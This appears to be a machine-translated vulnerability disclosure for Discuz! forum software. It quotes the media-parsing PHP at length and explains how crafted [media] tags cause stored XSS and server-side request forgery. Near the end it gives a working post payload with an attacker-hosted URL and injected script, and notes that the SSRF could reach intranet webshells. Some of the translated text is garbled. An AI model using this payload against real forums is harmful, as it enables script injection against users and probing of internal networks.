Discuz! Conditional storage xss and ssrf (easily met)
First, submit a chicken rib... In fact, the conditions are easily met.
Detailed description:File
Source \ function \ function_discuzcode.php
Function discuzcode
if(!defined('IN_MOBILE')) { if(strpos($msglower, '[/media]') !== FALSE) { $message = preg_replace("/\[media=([\w,]+)\]\s*([^\[\<\r\n]+?)\s*\[\/media\]/ies", $allowmediacode ? "parsemedia('\\1', '\\2')" : "bbcodeurl('\\2', '{url}')", $message); }
Tracking parsemedia
function parsemedia($params, $url) { $params = explode(',', $params); $width = intval($params[1]) > 800 ? 800 : intval($params[1]); $height = intval($params[2]) > 600 ? 600 : intval($params[2]); $url = addslashes($url); if(!in_array(strtolower(substr($url, 0, 6)), array('http:/', 'https:', 'ftp://', 'rtsp:/', 'mms://')) && !preg_match('/^static\//', $url) && !preg_match('/^data\//', $url)) { return dhtmlspecialchars($url); } if($flv = parseflv($url, $width, $height)) { return $flv; }
Tracking parseflv
function parseflv($url, $width = 0, $height = 0) { $lowerurl = strtolower($url); $flv = $iframe = $imgurl = ''; if($lowerurl != str_replace(array('player.youku.com/player.php/sid/','tudou.com/v/','player.ku6.com/refer/'), '', $lowerurl)) { $flv = $url; } elseif(strpos($lowerurl, 'v.youku.com/v_show/') !== FALSE) { $ctx = stream_context_create(array('http' => array('timeout' => 10))); if(preg_match("/http:\/\/v.youku.com\/v_show\/id_([^\/]+)(.html|)/i", $url, $matches)) { $flv = 'http://player.youku.com/player.php/sid/'.$matches[1].'/v.swf'; $iframe = 'http://player.youku.com/embed/'.$matches[1]; if(!$width && !$height) { $api = 'http://v.youku.com/player/getPlayList/VideoIDS/'.$matches[1]; $str = stripslashes(file_get_contents($api, false, $ctx)); if(!empty($str) && preg_match("/\"logo\":\"(.+?)\"/i", $str, $image)) { $url = substr($image[1], 0, strrpos($image[1], '/')+1); $filename = substr($image[1], strrpos($image[1], '/')+2); $imgurl = $url.'0'.$filename; } } } } elseif(strpos($lowerurl, 'tudou.com/programs/view/') !== FALSE) { if(preg_match("/http:\/\/(www.)?tudou.com\/programs\/view\/([^\/]+)/i", $url, $matches)) { $flv = 'http://www.tudou.com/v/'.$matches[2]; $iframe = 'http://www.tudou.com/programs/view/html5embed.action?code='.$matches[2]; if(!$width && !$height) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/(.+?)<\/span>/i", $str, $image)) { $imgurl = trim($image[1]); } } } } elseif(strpos($lowerurl, 'v.ku6.com/show/') !== FALSE) { if(preg_match("/http:\/\/v.ku6.com\/show\/([^\/]+).html/i", $url, $matches)) { $flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf'; if(!$width && !$height) { $api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) { $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]); } } } } elseif(strpos($lowerurl, 'v.ku6.com/special/show_') !== FALSE) { if(preg_match("/http:\/\/v.ku6.com\/special\/show_\d+\/([^\/]+).html/i", $url, $matches)) { $flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf'; if(!$width && !$height) { $api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) { $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]); } } } } elseif(strpos($lowerurl, 'www.youtube.com/watch?') !== FALSE) { if(preg_match("/http:\/\/www.youtube.com\/watch\?v=([^\/&]+)&?/i", $url, $matches)) { $flv = 'http://www.youtube.com/v/'.$matches[1].'&hl=zh_CN&fs=1'; $iframe = 'http://www.youtube.com/embed/'.$matches[1]; if(!$width && !$height) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/'VIDEO_HQ_THUMB':\s'(.+?)'/i", $str, $image)) { $url = substr($image[1], 0, strrpos($image[1], '/')+1); $filename = substr($image[1], strrpos($image[1], '/')+3); $imgurl = $url.$filename; } } } } elseif(strpos($lowerurl, 'tv.mofile.com/') !== FALSE) { if(preg_match("/http:\/\/tv.mofile.com\/([^\/]+)/i", $url, $matches)) { $flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1]; if(!$width && !$height) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) { $imgurl = trim($image[1]); } } } } elseif(strpos($lowerurl, 'v.mofile.com/show/') !== FALSE) { if(preg_match("/http:\/\/v.mofile.com\/show\/([^\/]+).shtml/i", $url, $matches)) { $flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1]; if(!$width && !$height) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) { $imgurl = trim($image[1]); } } } } elseif(strpos($lowerurl, 'video.sina.com.cn/v/b/') !== FALSE) { if(preg_match("/http:\/\/video.sina.com.cn\/v\/b\/(\d+)-(\d+).html/i", $url, $matches)) { $flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1]; if(!$width && !$height) { $api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1]; $str = file_get_contents($api, false, $ctx); if(!empty($str)) { $imgurl = str_replace('imgurl=', '', trim($str)); } } } } elseif(strpos($lowerurl, 'you.video.sina.com.cn/b/') !== FALSE) { if(preg_match("/http:\/\/you.video.sina.com.cn\/b\/(\d+)-(\d+).html/i", $url, $matches)) { $flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1]; if(!$width && !$height) { $api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1]; $str = file_get_contents($api, false, $ctx); if(!empty($str)) { $imgurl = str_replace('imgurl=', '', trim($str)); } } } } elseif(strpos($lowerurl, 'http://my.tv.sohu.com/u/') !== FALSE) { if(preg_match("/http:\/\/my.tv.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) { $flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1]; if(!$width && !$height) { $api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) { $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]); } } } } elseif(strpos($lowerurl, 'http://v.blog.sohu.com/u/') !== FALSE) { if(preg_match("/http:\/\/v.blog.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) { $flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1]; if(!$width && !$height) { $api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) { $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]); } } } } elseif(strpos($lowerurl, 'http://www.ouou.com/fun_funview') !== FALSE) { $str = file_get_contents($url, false, $ctx); if(!empty($str) && preg_match("/var\sflv\s=\s'(.+?)';/i", $str, $matches)) { $flv = $_G['style']['imgdir'].'/flvplayer.swf?&autostart=true&file='.urlencode($matches[1]); if(!$width && !$height && preg_match("/var\simga=\s'(.+?)';/i", $str, $image)) { $imgurl = trim($image[1]); } } } elseif(strpos($lowerurl, 'http://www.56.com') !== FALSE) { if(preg_match("/http:\/\/www.56.com\/\S+\/play_album-aid-(\d+)_vid-(.+?).html/i", $url, $matches)) { $flv = 'http://player.56.com/v_'.$matches[2].'.swf'; $matches[1] = $matches[2]; } elseif(preg_match("/http:\/\/www.56.com\/\S+\/([^\/]+).html/i", $url, $matches)) { $flv = 'http://player.56.com/'.$matches[1].'.swf'; } if(!$width && !$height && !empty($matches[1])) { $api = 'http://vxml.56.com/json/'.str_replace('v_', '', $matches[1]).'/?src=out'; $str = file_get_contents($api, false, $ctx); if(!empty($str) && preg_match("/\"img\":\"(.+?)\"/i", $str, $image)) { $imgurl = trim($image[1]); } } } if($flv) { if(!$width && !$height) { return array('flv' => $flv, 'imgurl' => $imgurl); } else { $width = addslashes($width); $height = addslashes($height); $flv = addslashes($flv); $iframe = addslashes($iframe); $randomid = 'flv_'.random(3); $enablemobile = $iframe ? 'mobileplayer() ? "<iframe allowfullscreen="" frameborder="0" height="\''.$height.'\'" src="\''.$iframe.'\'" width="\''.$width.'\'"></iframe>" : ' : ''; return '<script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=('.$enablemobile.'AC_FL_RunContent(\'width\', \''.$width.'\', \'height\', \''.$height.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', \''.$flv.'\', \'quality\', \'high\', \'bgcolor\', \'#ffffff\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\'));</script>'; } } else { return FALSE; }}
We can see that multiple use of file_get_contents
The url is controllable and ssrf exists.
And the result is OK. imgurl = is returned.
Used
Source \ function \ function_followcode.php
function fmakeflv($flv) { $randomid = 'video_'.random(3); $flv = is_array($flv) ? $flv : array('flv' => $flv); if(!empty($flv['imgurl'])) { $html = '
Restrictions:
The broadcast function must be enabled in the background for xss.
The ssrf must allow the use of [audio] [media] [flash] and other multimedia code.
The old version seems to be enabled by default, but the new version is disabled by default, but more are enabled later.
Post (Note: tools required to submit, otherwise the http://tudou.com is converted to [url] http://tudou.com)
[media=0,0]http://127.0.0.1:8080/s.php?http://tudou.com/programs/view/aaaa[/media]
Http: // MAID: 8080/s. php
Content:
http://www.hao123.com/logo.gif');">aa<script>alert('a');</script>
| Aa <script> alert ('A'); </script> |
Ssrf may shell Intranet
WooYun: Baidu's WebShell from SSRF to intranet 2
Filter.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
